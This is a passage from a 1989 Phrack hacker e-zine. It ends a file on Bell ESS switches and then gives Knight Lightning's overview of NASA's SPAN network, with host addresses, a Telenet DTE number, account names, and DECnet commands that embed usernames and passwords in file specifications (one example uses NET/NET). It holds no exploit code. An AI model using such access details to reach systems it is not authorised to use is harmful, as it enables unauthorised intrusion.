  658. single interface module.  Several RSMs can be interconnected to serve remote
  659. offices as large as 16,000 lines.  It is a standard 5ESS system interface
  660. module with the capability for stand-alone switching capability if the
  661. host-remote link fails.  One difference from the RSS of the RSM is the ability
  662. to use direct trunking, whereas the RSS requires that all interoffice calls
  663. pass through the host switch.
  664.  
  665.          Of course, there are many other switches out there, but these are the
  666. basic Western Electric switches provided for the Bell System.  The following
  667. is a time-table to summarize the occurrences of SPC switching systems that have
  668. been used by BOCs and AT&T:
  669.  
  670. 1965    The 1ESS used for local metropolitan allows 65,000 lines and 16,000
  671.         trunks.
  672. 1968    The 1ESS expands for local metropolitan and local tandem.
  673. 1970    The 2ESS used for local suburban has 30,000 lines and trunks together.
  674. 1974    The 1ESS allows 2-wire toll switching.
  675. 1976    The 4ESS uses large 4-wire toll for use of 100,000 trunks.
  676. 1976    The 1AESS for large metropolitan local use has 90,000 lines and 32,000
  677.         trunks
  678. 1976    The 2BESS for local suburban use has 30,000 lines and trunks together.
  679. 1976    The 3ESS for local rural use has 5,800 lines and trunks together.
  680. 1977    The 1AESS using 4-wire toll.
  681. 1979    The 1AESS has local, tandem, and toll capability.
  682. 1979    The 10A RSS is for local small rural areas with 2,000 lines.
  683. 1982    The 5ESS for local rural to large metropolitan areas with tandem and
  684.         toll capabilities has from 150,000 lines and 50,000 trunks to 0 lines
  685.         and 60,000 trunks.
  686. ______________________________________________________________________________
  687.  
  688.                                 ==Phrack Inc.==
  689.  
  690.                      Volume Three, Issue 25, File 4 of 11
  691.  
  692.               =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  693.               =-=                                             =-=
  694.               =-=                   S P A N                   =-=
  695.               =-=                                             =-=
  696.               =-=       Space Physics Analysis Network        =-=
  697.               =-=                                             =-=
  698.               =-=     Brought To You by Knight Lightning      =-=
  699.               =-=                                             =-=
  700.               =-=               March 15, 1989                =-=
  701.               =-=                                             =-=
  702.               =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  703.  
  704.  
  705. Preface
  706. ~~~~~~~
  707. In the spirit of the Future Transcendent Saga, I continue to bring forth
  708. information about the wide area networks.  The information presented in this
  709. file is based primarily on research.  I do not have direct access to SPAN other
  710. than through TCP/IP links, but this file should provide you with general
  711. information with which to properly use the Space Physics Analysis Network.
  712.  
  713.  
  714. Introduction
  715. ~~~~~~~~~~~~
  716. The Space Physics Analysis Network (SPAN) has rapidly evolved into a broadly
  717. based network for cooperative, interdisciplinary and correlative space and
  718. Earth science data analysis that is spaceflight mission independent.  The
  719. disciplines supported by SPAN originally were Solar-Terrestrial and
  720. Interplanetary Physics.  This support has been expanded to include Planetary,
  721. Astrophysics, Atmospherics, Oceans, Climate, and Earth Science.
  722.  
  723. SPAN utilizes up-to-date hardware and software for computer-to-computer
  724. communications allowing binary file transfer, mail, and remote log-on
  725. capability to over 1200 space and Earth science computer systems in the United
  726. States, Europe, and Canada.  SPAN has been reconfigured to take maximum
  727. advantage of NASA's Program Support Communication Network (PSCN) high speed
  728. backbone highway that has been established between its field centers.  In
  729. addition to the computer-to-computer communications which utilizes DECnet, SPAN
  730. provides gateways to the NASA Packet Switched System (NPSS), GTE/Telenet,
  731. JANET, ARPANET, BITNET and CSNET.  A major extension for SPAN using the TCP/IP
  732. suite of protocols has also been developed.
  733.  
  734. This file provides basic information on SPAN, it's history, architecture, and
  735. present guidelines for it's use.  It is anticipated that SPAN will continue to
  736. grow very rapidly over the next few years.  Several existing wide-area DECnet
  737. networks have joined with SPAN to provide a uniform internetwork structure and
  738. more will follow.
  739.  
  740.  
  741. History Of The SPAN and the Data Systems Users Working Group (DSUWG)
  742. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  743. A considerable evolution has occurred in the past two decades in the way
  744. scientific research in all disciplines is done.  This is particularly true of
  745. NASA where early research was centered around exploratory missions in which
  746. measurements from individual scientific instruments could be meaningfully
  747. employed to advance the state of knowledge.  As these scientific disciplines
  748. have progressed, a much more profound and interrelated set of questions is
  749. being posed by researchers.  The result is that present-day investigations are
  750. generally much more complex.  For example, within the space science community
  751. large volumes of data are acquired from multiple sensors on individual
  752. spacecraft or ground-based systems and, quite often, data are needed from many
  753. institutions scattered across the country in order to address particular
  754. physical problems.  It is clear that scientific research during the late 1980s
  755. and beyond will be devoted to intense multi-disciplinary studies aimed at
  756. exploring very complex physical questions.  In general, the need for
  757. researchers to exchange data and technical information in a timely and
  758. interactive way has been increasing.
  759.  
  760. The problems of data exchange are exacerbated by the lack of standards for
  761. scientific data bases.  The net result is that, at present, most researchers
  762. recognize the value of multi-disciplinary studies, but the cost in time and
  763. effort is devastating to their research efforts.  This trend is antithetical to
  764. the needs of the NASA research community.  SPAN is only one of many research
  765. networks that are just beginning to fill a need for access to remote
  766. capabilities that are not obtainable locally.
  767.  
  768. In May of 1980 the Space Plasma Physics Branch of the Office of Space Science
  769. of NASA Headquarters funded a project at Marshall Space Flight Center (MSFC) to
  770. investigate ways of performing correlative space plasma research nationwide on
  771. a daily basis.  As a first step, a user group was formed called the Data
  772. Systems Users Working Group (DSUWG) to provide the space science community
  773. interaction and direction in the project.  After the first meeting of the DSUWG
  774. in September 1980, it was decided that the approach would be to design, build,
  775. and operate a spacecraft mission independent science network as a test case.
  776. In addition, the construction of the system would be designed to use existing
  777. data analysis computer systems at space physics institutions and to take full
  778. advantage of "off-the-shelf" software and hardware.
  779.  
  780. The Space Physics Analysis Network (SPAN) first became operational in December
  781. 1981 with three major nodes:
  782.  
  783. o  University of Texas at Dallas
  784. o  Utah State University
  785. o  MSFC
  786.  
  787. Since that time it has grown rapidly.  Once operational, SPAN immediately
  788. started to facilitate space-data analysis by providing electronic mail,
  789. document browsing, access to distributed data bases, facilities for numeric and
  790. graphic data transfer, access to Class VI machines, and entry to gateways for
  791. other networks.
  792.  
  793. The DSUWG continues to provide guidance for SPAN growth and seeks to identify,
  794. promote, and implement appropriate standards for the efficient management and
  795. exchange of data, related information, and graphics.  All SPAN member
  796. organizations are expected to participate in the DSUWG.  The basic composition
  797. of the DSUWG is a representative scientist and computer systems manager (who
  798. has the networking responsibility) at each of the member institutions.  DSUWG
  799. meetings are held regularly at approximately nine month intervals.
  800.  
  801. The DSUWG is structured along lines conducive to addressing major outstanding
  802. problems of scientific data exchange and correlation.  There is a chairman for
  803. each subgroup to coordinate and focus the group's activities and a  project
  804. scientist to oversee the implementation of the DSUWG recommendations and
  805. policies.  The working group itself is divided into several subgroups which
  806. address issues of policy, networking and hardware, software and graphics
  807. standards, and data base standards.
  808.  
  809. The DSUWG is a dynamic, evolving organization.  We expect members to move in
  810. (or out) as appropriate to their active involvement in data related issues.  We
  811. also realize that at present SPAN and the DSUWG are dealing with only a limited
  812. portion of the whole spectrum of problems facing the NASA research community.
  813. As present problems are solved, as the network evolves, and as new issues
  814. arise, we look to the DSUWG to reflect these changes in it's makeup, structure,
  815. and focus.
  816.  
  817. The SPAN is currently managed by the National Space Science Data Center (NSSDC)
  818. located at Goddard Space Flight Center (GSFC).  All SPAN physical circuits are
  819. funded by the Communication and Data Systems Division at NASA Headquarters.
  820. Personnel at the NSSDC facility, at the NASA SPAN centers, and the remote
  821. institutions work in unison to manage and maintain the network.
  822.  
  823.  
  824. Network Configuration and Evolution
  825. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  826. The initial topology for SPAN was a modified star where all communication with
  827. the remote institutions came to a major central switching or message routing
  828. node at MSFC.  This topology served the network well until many new nodes were
  829. added and more scientists became accustomed to using the network.  As data rate
  830. demands on the network increased, it was apparent that a new topology using
  831. lines with higher data rates was needed.  Toward this end, a new communication
  832. architecture for SPAN was constructed and implemented.
  833.  
  834. The current structure of SPAN in the United States is composed of an
  835. interconnected four-star, mesh topology.  Each star has, as its nucleus, a SPAN
  836. routing center.  The routing centers are located at GSFC, MSFC, Jet Propulsion
  837. Lab (JPL), and Johnson Space Center (JSC).  The routing centers are linked
  838. together by a set of redundant 56 kbps backbone circuits.  Tail circuits, at
  839. speeds of 9.6 kbps (minimum line speed), are connected to each routing center
  840. and and into the SPAN backbone.
  841.  
  842. Most remote institutions have local area networks that allow a number of
  843. different machines to be connected to SPAN.   Regardless of a machine's
  844. position in the network, all computers on SPAN are treated logically equal.
  845. The main goal of the new SPAN architecture is for a node that is located across
  846. the country through two routing centers to be as transparently accessible as a
  847. SPAN node sharing the same machine room with the originating system.  This ease
  848. of use and network transparency is one of SPAN's greatest assets.
  849.  
  850. The new configuration allows for rapid expansion of the network via the
  851. addition of new tail circuits, upgrade to existing tail circuits, and dynamic
  852. dialing of higher data-rate backbone circuits Implementation of this new
  853. configuration began in July 1986, and the new topology was completed in
  854. November 1986, although there are new circuits being added on a continuing
  855. basis.  It is expected that a fifth routing center located at Ames Research
  856. Center.
  857.  
  858. Nearly all of the machines on SPAN are linked together using the commercially
  859. available software package DECnet.  DECnet allows suitably configured computers
  860. (IBM-PCs and mainframes, SUN/UNIX workstations, DEC/PROs, PDPs, VAXs, and
  861. DECSYSTEMs) to communicate across a variety of media (fiber optics, coax,
  862. leased telephone lines, etc.) utilizing a variety of low level protocols
  863. (DDCMP, Ethernet, X.25).  There are also several institutions that are
  864. connected through Janus hosts which run more then one protocol.
  865.  
  866. SPAN links computers together and touches several other networks in the United
  867. States, Europe, and Canada  that are used for data analysis on NASA spaceflight
  868. missions and other NASA related projects.  At this time, there are well over
  869. 1200+ computers that are accessible through SPAN.
  870.  
  871. DECnet networks has been accomplished by the unprecedented, successful
  872. cooperation of the network management of the previously separate networks.  For
  873. example, the International High Energy Physics Network (HEPNET), the Canadian
  874. Data Analysis Network (DAN) and the Texas University Network (TEXNET) now have
  875. nonconflicting network addresses.  Every node on each of these networks is as
  876. accessible to SPAN users as any other SPAN node.  The mutual cooperation of
  877. these WANs has given enhanced capabilities for all.
  878.  
  879. There are several capabilities and features that SPAN is developing, making it
  880. unique within the NASA science community.  The SPAN system provides remote
  881. users with access to science data bases and brings scientists throughout the
  882. country together in a common working environment. Unlike past NASA mission
  883. networks, where the remote sites have only remote terminals (supporting one
  884. person at the remote site at a time), SPAN supports many users simultaneously
  885. at each remote node through computer-to-remote computer communications
  886. software.  Users at their institutions can participate in a number of network
  887. functions involving other remote computer facilities.  Scientific papers, data
  888. and graphics files can easily be transferred between network nodes.  This
  889. significantly reduces the time it takes to perform correlative work when
  890. authors are located across the country or ocean.  As an introduction to SPAN's
  891. network wide capabilities.  More advanced users are referred to the DEC DECnet
  892. User's Manual.
  893.  
  894. SPAN will continue to be used as a test case between NASA science investigators
  895. with the intent of exploring and employing modern computer and communication
  896. technology as a tool for doing NASA science research.  This can be accomplished
  897. because SPAN is not a project dependent system that requires a static hardware
  898. and software configuration for the duration of a mission.  SPAN has provided a
  899. quick reaction capability for several NASA and ESA missions.  Each of these
  900. missions needed to rapidly move near real-time ground and spacecraft
  901. observations to a variety of destinations for analysis and mission planning.
  902. Because of SPAN's great success, new NASA spaceflight missions are seriously
  903. looking into creating networks with similar capabilities that are
  904. internetworked with SPAN.
  905.  
  906. Within the next few years, new developments in software and hardware will be
  907. implemented on SPAN that will continue to aid NASA science research.  It is
  908. anticipated that SPAN will greatly improve its access to gateways into Europe
  909. and other locations throughout the world.  As a natural evolution, SPAN will
  910. migrate toward the International Standards Organization's (ISO) Open Systems
  911. Interconnect (OSI) protocol as the software becomes available.  It is expected
  912. that the ISO/OSI protocol will greatly enhance SPAN and increase the number of
  913. heterogeneous computer systems accessible.
  914.  
  915.  
  916. Security And Conduct On The Network
  917. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  918. Misconduct is defined as:
  919.  
  920.      1.  Any unauthorized access or use of computers on the network,
  921.      2.  Attempts to defeat computer security systems (e.g. violating a captive
  922.          account),
  923.      3.  Repeated login failures to computers or privileged accounts to which
  924.          the user is not authorized to use,
  925.      4.  Massive file transfers from a given site without prior consent and
  926.          coordination with the appropriate SPAN routing centers.
  927.  
  928. The network is monitored very closely, and it is relatively simple to spot an
  929. attempted break-in and then track down the source.  When a violation is found,
  930. the matter will be reported to the DSUWG steering committee and the SPAN line
  931. will be in immediate danger of being disconnected.  If the situation cannot be
  932. resolved to the satisfaction of both the DSUWG steering committee and network
  933. management, the SPAN line to the offending site will be reviewed for the
  934. possibility of permanent disconnection.  In short, NASA pays for the
  935. communications lines and will not tolerate misconduct on the network.
  936.  
  937.  
  938. SPAN Network Information Center (SPAN-NIC)
  939. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  940. The SPAN-NIC is located at the National Space Science Data Center in Greenbelt,
  941. Maryland.  The purpose of the SPAN-NIC is to provide general user services and
  942. technical support to SPAN users via telephone, electronic mail, and postal
  943. mail.
  944.  
  945. As SPAN has grown exponentially over recent years, it was realized that a
  946. central organization had to be developed to provide users with technical
  947. assistance to better utilize the resources that the network provides.  This is
  948. accomplished by maintaining and distributing relevant technical documents,
  949. providing user assistance on DECnet related questions, monitoring traffic on
  950. the network, and maintaining an online data base of SPAN node information.
  951. More specific information on becoming a SPAN site, beyond that provided in this
  952. document, can also be obtained through SPAN-NIC.
  953.  
  954. The SPAN-NIC uses a VAX 8650 running VMS as its host computer.  Users wishing
  955. to use the online information services can use the account with the username
  956. SPAN_NIC.  Remote logins are capable via SET HOST from SPAN, TELENET from
  957. ARPANET and by other procedures detailed later.
  958.  
  959.         SPAN-NIC DECnet host address: NSSDCA or 6.133
  960.  
  961.         SPAN-NIC ARPANET host address: NSSDC.ARPA or 128.183.10.4
  962.  
  963.         SPAN-NIC GTE/TELENET DTE number: 311032107035
  964.  
  965. An alternative to remote login is to access online text files that are
  966. available.  These text files reside in a directory that is pointed to by the
  967. logical name "SPAN_NIC:". Example commands for listing this directory follow:
  968.  
  969.         From SPAN: $ DIRECTORY NSSDCA::SPAN__NIC:
  970.         From ARPA: FTP> ls SPAN__NIC:
  971.  
  972. The available files and a synopsis of their contents can be found in the file
  973. "SPAN_NIC:SPAN_INDEX.TXT".  Once a file is identified, it can be transferred to
  974. the remote host using the VMS COPY command, or the FTP GET command.  It is
  975. important to note that this capability will be growing significantly not only
  976. to catch up to the current SPAN configuration but also keep current with its
  977. growth.
  978.  
  979.  
  980. DECnet Primer
  981. ~~~~~~~~~~~~~
  982. The purpose of the SPAN is to support communications between users on network
  983. nodes.  This includes data access and exchange, electronic mail communication,
  984. and sharing of resources among members of the space science community.
  985.  
  986. Communication between nodes on the SPAN is accomplished by means of DECnet
  987. software.  DECnet software creates and maintains logical links between network
  988. nodes with different or similar operating systems. The operating systems
  989. currently in use on SPAN are VAX/VMS, RSX, and IAS. DECnet provides network
  990. control, automatic routing of messages, and a user interface to the network.
  991. The DECnet user interface provides commonly needed functions for both terminal
  992. users and programs.  The purpose of this section of the file is to provide a
  993. guide on the specific implementation of DECnet on SPAN and is not intended to
  994. supercede the extensive manuals on DECnet already produced by DEC.
  995.  
  996. DECnet supports the following functions for network users:
  997.  
  998. 1. TASK-TO-TASK COMMUNICATIONS:  User tasks can exchange data over a network
  999.    logical link.  The communicating tasks can be on the same or different
  1000.    nodes.  Task-to- task communication can be used to initiate and control
  1001.    tasks on remote nodes.
  1002.  
  1003. 2. REMOTE FILE ACCESS:  Users can access files on remote nodes at a terminal or
  1004.    within a program.  At a terminal, users can transfer files between nodes,
  1005.    display files and directories from remote nodes, and submit files containing
  1006.    commands for execution at a remote node. Inside a program, users can read
  1007.    and write files residing at a remote node.
  1008.  
  1009. 3. TERMINAL COMMUNICATIONS:  RSX and IAS users can send messages to terminals
  1010.    on remote RSX or IAS nodes.  This capability is available on VMS nodes by
  1011.    using the PHONE utility.
  1012.  
  1013. 4. MAIL FACILITY:  VMS users can send mail messages to accounts on remote VMS
  1014.    nodes.  This capability is currently available for RSX and IAS nodes but is
  1015.    not supported by DEC.  There are slight variations for RSX and IAS network
  1016.    mail compared to VMS mail.
  1017.  
  1018. 5. REMOTE HOST:  VMS, RSX, and IAS users can log-on to a remote host as if
  1019.    their terminals were local.
  1020.  
  1021.  
  1022. Network Implementations For DECnet
  1023. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1024. The SPAN includes implementations for RSX, IAS and VAX/VMS operating systems.
  1025. DECnet software exists at all the SPAN nodes and it allows for the
  1026. communication of data and messages between any of the nodes.  Each of the
  1027. network nodes has a version of DECnet that is compatible with the operating
  1028. system of that node.  These versions of DECnet have been presently developed to
  1029. different extents causing some nodes to have more or less capabilities than
  1030. other nodes.  The version or "phase" of the DECnet, as it is called, indicates
  1031. the capability of of that node to perform certain levels of communication.
  1032. Since RSX and IAS implementations are almost identical, they are described
  1033. together.
  1034.  
  1035. Users need not have any special privileges (VAX/VMS users will need the NETMBX
  1036. privilege on their account) to run network tasks or create programs which
  1037. access the network.  However users must supply valid access control information
  1038. to be able to use resources.  The term "access control" refers to the user name
  1039. and password of an account (local or on a remote node).
  1040.  
  1041. Online system documentation is a particularly important and valuable component
  1042. of DEC systems.  At the present, SPAN is comprised almost completely of DEC
  1043. systems.  An extensive set of system help files and libraries exists on all the
  1044. SPAN DEC nodes.  The HELP command invokes the HELP Utility to display
  1045. information about a particular topic.  The HELP utility retrieves help
  1046. available in the system help files or in any help library that you specify. You
  1047. can also specify a set of default help libraries for HELP to search in addition
  1048. to these libraries.
  1049.  
  1050.    Format:   HELP [keyword [...]]
  1051.  
  1052. On many systems, new users can display a tutorial explanation of HELP by typing
  1053. TUTORIAL in response to the "HELP Subtopic?" prompt and pressing the RETURN
  1054. key.
  1055.  
  1056.  
  1057. Utilities for DECnet-VAX
  1058. ~~~~~~~~~~~~~~~~~~~~~~~~
  1059. VAX terminal users have several utility programs for network communications
  1060. available from the VMS operating system.  Documentation for most of these
  1061. utilities can be found in the Utility Reference Manual of the VAX/VMS manual
  1062. set, and each utility has extensive online help available.  The following
  1063. descriptions offer a brief introduction to these utilities:
  1064.  
  1065. MAIL:  The VAX/VMS mail utility allows you to send a message to any account or
  1066.        to a series of accounts on the network.  To send a message, you must
  1067.        know the account name of the person you wish to contact and his node
  1068.        name or node number. (This will be covered more extensively later in
  1069.        this file).
  1070.  
  1071. FINGER:  The DECUS VAX/VMS Finger utility has been installed on a number of
  1072.          SPAN VAX/VMS systems.  Finger allows a user to see who is doing what,
  1073.          both on his machine and on other machines on the network that support
  1074.          Finger.  Finger also allows a user to find information about the
  1075.          location and accounts used by other users, both locally and on the
  1076.          network. The following is an example session using the FINGER utility.
  1077.  
  1078. $ FINGER
  1079.  
  1080.  
  1081.           NSSDCA VAX 8600, VMS V4.3. Sunday, 28-Sep-1986 19:55,4 Users,0 Batch.
  1082.           Up since Sunday, 28-Sep-1986 14:28
  1083.  
  1084.  Process         Personal name        Program  Login Idle Location
  1085.  
  1086.  HILLS           H.Kent Hills         Tm       19:02      NSSDC.DECnet
  1087.  _RTA4:          Dr. Ken Klenk        Tm       17:55      NSSDC.DECnet
  1088.  _NVA1:          Michael L. Gough     Mail     15:13
  1089.  SPAN Man        Joe Hacker           Finger   17:33      bldg26/111
  1090.  
  1091.  
  1092.  $ FINGER SWAFFORD@NSSDCA
  1093.  
  1094.  [NSSDCA.DECnet]
  1095.  
  1096.  NSSDCA VAX/VMS, Sunday, 28-Sep-1986 19:55
  1097.  
  1098.  Process         Personal name        Program   Login  Idle Location
  1099.  
  1100.  SPAN Man                             Finger    17:33
  1101.  
  1102.   Logged in since: Sunday, 28-Sep-1986 17:33
  1103.  
  1104.   Mail: (no new mail)
  1105.  
  1106.   Plan:
  1107.  
  1108.      Joe Hacker, SPAN Hackers Guild
  1109.  
  1110.      Telephone: (800)555-6000
  1111.  
  1112. If your VAX supports VMS Finger, further information can be found by typing
  1113. HELP FINGER.  If your system does not currently have the FINGER utility, a copy
  1114. of it is available in the form of a BACKUP save set in the file:
  1115. NSSDCA::SPAN_NIC:FINGER.BCK
  1116.  
  1117. PHONE:  The VAX/VMS PHONE utility allows you to have an interactive
  1118.         conversation with any current user on the network.  This utility can
  1119.         only be used on video terminals which support direct cursor
  1120.         positioning.  The local system manager should know if your terminal can
  1121.         support this utility.  To initiate a phone call, enter the DCL command
  1122.         PHONE.  This should clear the screen and set up the phone screen
  1123.         format.  The following commands can be executed:
  1124.  
  1125. DIAL nodename::username
  1126.  
  1127.          Places a call to another user.  You must wait for a response from that
  1128.          user to continue.  DIAL is the default command if just
  1129.          nodename::username is entered.
  1130.  
  1131.  
  1132. ANSWER Answers the phone when you receive a call.
  1133.  
  1134. HANGUP Ends the conversation (you could also enter a CTRL/Z).
  1135.  
  1136. REJECT Rejects the phone call that has been received.
  1137.  
  1138. DIR nodename::
  1139.  
  1140.          Displays a list of all current users on the specified node.  This
  1141.          command is extremely useful to list current users on other nodes of
  1142.          the network.
  1143.  
  1144. FACSIMILE filename
  1145.  
  1146.          Will send the specified file to your listener as part of your
  1147.          conversation.
  1148.  
  1149. To execute any of these commands during a conversation, the switch hook
  1150. character must be entered first.  By default, that character is the percent
  1151. key.
  1152.  
  1153. REMOTE FILE ACCESS:  DCL commands that access files will act transparently over
  1154.                      the network.  For example, to copy a file from a remote
  1155.                      node:
  1156.  
  1157. $copy
  1158.  
  1159. From: node"username password"::disk:[directory]file.lis
  1160. To: newfile.lis
  1161.  
  1162. This will copy "file.lis" in "directory" on "node" to the account the command
  1163. was issued in and name it "newfile.lis".  The access information (user name and
  1164. password of the remote account) is enclosed in quotes.  Note that you can also
  1165. copy that same file to any other node and account you desire.  For another
  1166. example, to obtain a directory listing from a remote node, use the following
  1167. command:
  1168.  
  1169. $dir node::[directory] (if on the default disk)
  1170.  
  1171.  
  1172. Utilities for DECnet-11M/DECnet-IAS
  1173. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1174. There are certain DECnet functions that can only be done on nodes that have the
  1175. same type of operating systems, such as the MPB, TRW, SPRL, LASR, and UTD nodes
  1176. all with an RSX-11M operating system.  The capabilities offered to the RSX
  1177. DECnet user can be broken down into two major categories: those functions for
  1178. terminal users and those functions for FORTRAN programmers.
  1179.  
  1180. DECnet-11M terminal users have several utility programs available to them which
  1181. allows logging onto other machines in the network, file transfers, message
  1182. communication, and network status information.
  1183.  
  1184. REMOTE-LOGON:  The REMOTE-LOGON procedure allows a user at a node to log-on to
  1185.                another node in the network.  This capability is also called
  1186.                virtual terminal.  The "SET /HOST=nodename" command allows the
  1187.                user to log-on to adjacent nodes in the network from a
  1188.                DECnet-11M node.  This command is initiated by simply typing
  1189.                "SET /HOST=nodename".  The "SET HOST" command on the SPAN-VAX
  1190.                also allows you to log-on to adjacent nodes.
  1191.  
  1192. NETWORK FILE TRANSFER:  NFT is the Network File Transfer program and is part of
  1193.                         the DECnet software.  It is invoked by typing NFT <CR>
  1194.                         to file = from file or by typing NFT to file = from
  1195.                         file.  Embedded in the file names must be the node
  1196.                         name, access information, and directory if it is
  1197.                         different than the default conventions.  Also note that
  1198.                         file names can only be 9 (nine) characters long on RSX
  1199.                         systems.
  1200.  
  1201.                         Therefore, VAX/VMS files with more than 9 characters
  1202.                         will not copy with default-file naming.  In such a case
  1203.                         you must explicitly name the file being copied to an
  1204.                         RSX system.  The following structure for the file names
  1205.                         must be used when talking to the SPAN nodes with NFT.
  1206.  
  1207.                         NODE/username/password::Dev:[dir.sub-dir]file.type
  1208.  
  1209.                         The following NFT switches are very useful:
  1210.  
  1211.                         /LI   Directory listing switch.
  1212.                         /AP   Appends/adds files to end of existing file.
  1213.                         /DE   Deletes one or more files.
  1214.                         /EX   Executes command file stored on remote/local
  1215.                               node.
  1216.                         /SB   Submits command file for execution
  1217.                               (remote/local).
  1218.                         /SP   Spools files to the line printer (works only with
  1219.                               "like" nodes).
  1220.  
  1221.                         A particular use for NFT is for the display of graphics
  1222.                         files on the network.  It is important to note,
  1223.                         however, that some device-dependent graphics files are
  1224.                         not all displayable, such as those generated by IGL
  1225.                         software.  The graphic files generated by graphic
  1226.                         packages that are displayable when residing at other
  1227.                         nodes may be displayed by using the following input:
  1228.  
  1229.                         NFT> TI:=SPAN/NET/NET::[NETNET.RIMS]D1364.COL
  1230.  
  1231.                         Graphics files generated by IGL can be displayed by
  1232.                         running either REPLAY or NETREP programs (see the
  1233.                         net-library documentation).
  1234.  
  1235. TERMINAL COMMUNICATIONS:  TLK is the Terminal Communications Utility which
  1236.                           allows users to exchange messages through their
  1237.                           terminals.  TLK somewhat resembles the RSX broadcast
  1238.                           command but with more capabilities.  TLK currently
  1239.                           works only between RSX-11 nodes and within a RSX-11
  1240.                           node.  There are two basic modes of operation for
  1241.                           TLK:  The single message mode and the dialogue mode.
  1242.  
  1243.                           The single message mode conveys short messages to any
  1244.                           terminal in the same node or remote node.  The syntax
  1245.                           for this operation is:
  1246.  
  1247.                           >TLK TARGETNODE::TTn:--Message--
  1248.  
  1249.                           To initiate the the dialogue mode type:
  1250.  
  1251.                           >TLK TARGETNODE::TTn<cr>
  1252.  
  1253.                           When you receive the TLK> prompt, you can enter a new
  1254.                           message line.
  1255.  
  1256.  
  1257. Graphics Display Utilities
  1258. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  1259. One of the main objectives of the SPAN system project is to accommodate
  1260. coordinated data analysis without leaving one's institution.  Therefore, there
  1261. is a strong need to develop the ability to have graphic images of data from any
  1262. node to be displayed by any other node.  The current inability to display data
  1263. on an arbitrary graphics device at any node has been quickly recognized. As
  1264. general network utilities are developed to support the display of device
  1265. dependent and independent graphic images, the handbook SPAN Graphics Display
  1266. Utilities Handbook will serve to document their use and limitations.  The
  1267. graphics handbook is a practical guide to those common network facilities which
  1268. will be used to support network correlative studies from the one-to-one to the
  1269. workshop levels.  For each graphics software utility the handbook contains
  1270. information necessary to obtain, use, and implement the utility.
  1271.  
  1272.  
  1273. Network Control Program
  1274. ~~~~~~~~~~~~~~~~~~~~~~~
  1275. NCP is the Network Control Program and is designed primarily to help the
  1276. network manager.  However, there are some NCP commands which are useful for the
  1277. general user.  With these commands, the user can quickly determine node names
  1278. and whether nodes are reachable or not.  Help can be obtained by entering
  1279. NCP>HELP and continuing from there.  For a complete listing of all the NCP
  1280. commands that are available to nonpriviledged users, refer to the NCP Utility
  1281. manual on VAXs, and the NCP appendix of the DECnet-11M manual for PDPs.  The
  1282. following two commands are probably the most beneficial to users:
  1283.  
  1284. $ RUN SYS$SYSTEM:NCP       !on VAXs
  1285.  
  1286.        -or-
  1287.  
  1288. > RUN $NCP                 !on PDPs
  1289.  
  1290. NCP> SHOW KNOWN NODES      !show a list of all nodes
  1291.                            !   defined in the volatile data base
  1292. NCP> SHOW ACTIVE NODES     !show a list of only currently reachable
  1293.  
  1294. Please note that the second command cannot be used on "end nodes", that is,
  1295. nodes that do not perform at least DECnet Level I routing.  In addition, only
  1296. nodes in the user's area will be displayed on either Level I or Level II
  1297. routers.  In the case of end nodes, users should find out the name of the
  1298. nearest Level I or II routing node and issue the following command:
  1299.  
  1300. NCP> TELL GEORGE SHOW ACTIVE NODES
  1301.  
  1302.  
  1303. Mail
  1304. ~~~~
  1305. As briefly discussed earlier all SPAN DEC nodes have a network mail utility.
  1306. Before sending a mail message, the node name and user name must be known.  To
  1307. send a message to the project manager, you would enter the following commands:
  1308.  
  1309. $ MAIL
  1310.  
  1311. MAIL> SEND
  1312.  
  1313. To: NSSDCA::THOMAS
  1314. Subj: MAIL UTILITY TEST
  1315. Enter your message below. Press ctrl/z when complete
  1316. ctrl/c to quit:
  1317.  
  1318. VALERIE,
  1319.    OUR NETWORK CONNECTION IS NOW AVAILABLE AT ALL TIMES.  WE ARE LOOKING
  1320. FORWARD TO WORKING FULL TIME ON SPAN.  THANKS FOR ALL YOUR HELP.
  1321.  
  1322.                             FRED
  1323. <CTRL/Z>
  1324.  
  1325. MAIL>EXIT
  1326.  
  1327. In order to send mail to more than one user, list the desired network users on
  1328. the same line as the TO: command, separating each with a comma.  Another way to
  1329. accomplish this is to use a file of names.  For example, in the file SEPAC.DIS,
  1330. all SEPAC investigators on SPAN are listed:
  1331.  
  1332.         SSL::ROBERTS
  1333.         SSL::REASONER
  1334.         SSL::CHAPPELL
  1335.         SWRI::JIM
  1336.         TRW::TAYLOR
  1337.         STAR::WILLIAMSON
  1338.  
  1339. The network mail utility will send duplicate messages to all those named in the
  1340. above file by putting the file name on the TO: command line (TO: @SEPAC).  A
  1341. second option for the SEND command is to include a file name that contains the
  1342. text to be sent.  You will still be prompted for the To: and Subject:
  1343. information.  The following statements give a brief description of other
  1344. functions of the MAIL utility:
  1345.  
  1346.  READ n     Will list, on the terminal, the mail message corresponding to
  1347.             number n.  If n is not entered, new mail messages will be listed.
  1348.  
  1349.  EXTRACT    Saves a copy of the current message to a designated file.
  1350.  
  1351.  FORWARD    Sends a copy of the current message to other users.
  1352.  
  1353.  REPLY      Allows you to send a message to the sender of the current message.
  1354.  
  1355.  DIR        Lists all messages in the current folder that you have selected.
  1356.             The sequence numbers can then be used with the READ command.
  1357.  
  1358.  DEL        Delete the message just read.  The message is actually moved to the
  1359.             WASTEBASKET folder until you exit the utility, when it is actually
  1360.             deleted.  Therefore, you can retrieve a message that you have
  1361.             "deleted", up until you enter "exit" or ^Z to the MAIL> prompt.
  1362.  
  1363.  HELP       Always useful if you're lost.
  1364.  
  1365.  
  1366. Remote Node Information Files
  1367. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1368. All nodes on the SPAN are required to maintain two node specific information
  1369. files in their DECnet default directories.
  1370.  
  1371. The first file is a network user list file that contains specific information
  1372. on each network user who has an account on the machine.  At a minimum, the user
  1373. list file should contain the name of the user, his electronic mail address, his
  1374. account/project identifier, and his default directory.  All of this information
